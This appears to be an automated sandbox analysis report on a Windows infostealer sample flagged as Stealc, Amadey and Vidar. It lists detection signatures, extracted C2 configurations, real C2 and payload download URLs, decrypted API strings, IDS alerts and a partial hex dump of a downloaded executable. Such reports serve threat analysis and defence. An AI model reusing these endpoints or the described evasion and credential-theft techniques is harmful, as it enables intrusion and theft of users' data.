Windows Analysis Report
EZrw1nNIpG.exe

Overview

General Information

Sample name: EZrw1nNIpG.exe
renamed because original name is a hash value
Original sample name: e3cbb274e66e95a1b7ee5c05d87abbd5.exe
Analysis ID: 1462819
MD5: e3cbb274e66e95a1b7ee5c05d87abbd5
SHA1: 93d96f3d0b6e5d13242c88af9dc9648cbc60fd0b
SHA256: e6c76393ad6b5516ed6e84adbd0687f981bf3c419e99d9c235a6948e63d383d4
Tags: 32exeStealctrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: EZrw1nNIpG.exe Avira: detected
Antivirus detection for URL or domain
Source: http://147.45.47.155/ku4Nor9/index.php17037dc9 Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll0~ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpsHy~ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dlls9 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.php Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpspace Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpft Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php% Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeLL: Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe50673b5d Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/windows.storage.dllc Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php5 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.php-3693405117- Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpl2 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phprsion Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeK Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpvJw Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpE1 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exepera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllb Avira URL Cloud: Label: malware
Source: http://147.45.47.155/SysWOW64 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dlli8 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll-~ Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpmL Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllq Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php%? Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeAL- Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpM Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.php;R Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpH Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explortu.exe.736.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://147.45.47.155/ku4Nor9/index.php"]}
Source: EZrw1nNIpG.exe.3792.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 26% Perma Link
Source: http://147.45.47.155/ Virustotal: Detection: 20% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 14% Perma Link
Source: http://147.45.47.155/ku4Nor9/index.php Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php% Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php5 Virustotal: Detection: 10% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: EZrw1nNIpG.exe ReversingLabs: Detection: 50%
Source: EZrw1nNIpG.exe Virustotal: Detection: 54% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: EZrw1nNIpG.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetProcAddress
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LoadLibraryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcatA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: OpenEventA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateEventA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CloseHandle
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Sleep
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserDefaultLangID
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualAllocExNuma
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemInfo
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HeapAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetComputerNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcpyA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetProcessHeap
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetCurrentProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrlenA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ExitProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SystemTimeToFileTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: advapi32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: gdi32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: user32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: crypt32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ntdll.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateDCA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetDeviceCaps
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ReleaseDC
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CryptStringToBinaryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: sscanf
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VMwareVMware
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HAL9TH
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: JohnDoe
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DISPLAY
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: %hu/%hu/%hu
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: http://85.28.47.4
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: /920475a59bac849d.php
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: /69934896f997d5bb/
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: default
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileAttributesA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalLock
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HeapFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileSize
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalSize
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: IsWow64Process
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Process32Next
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLocalTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FreeLibrary
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetTimeZoneInformation
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemPowerStatus
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetVolumeInformationA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Process32First
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLocaleInfoA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetModuleFileNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DeleteFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindNextFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LocalFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindClose
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LocalAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileSizeEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ReadFile
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SetFilePointer
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: WriteFile
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindFirstFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CopyFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualProtect
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLastError
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcpynA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: MultiByteToWideChar
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: WideCharToMultiByte
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: OpenProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: TerminateProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetCurrentProcessId
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: gdiplus.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ole32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: bcrypt.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: wininet.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: shlwapi.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: shell32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: psapi.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: rstrtmgr.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SelectObject
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: BitBlt
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C7D6C80
Uses 32bit PE files
Source: EZrw1nNIpG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49713
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49713
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49730 -> 147.45.47.155:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 147.45.47.155:80 -> 192.168.2.6:49730
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49733 -> 85.28.47.4:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 147.45.47.155
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 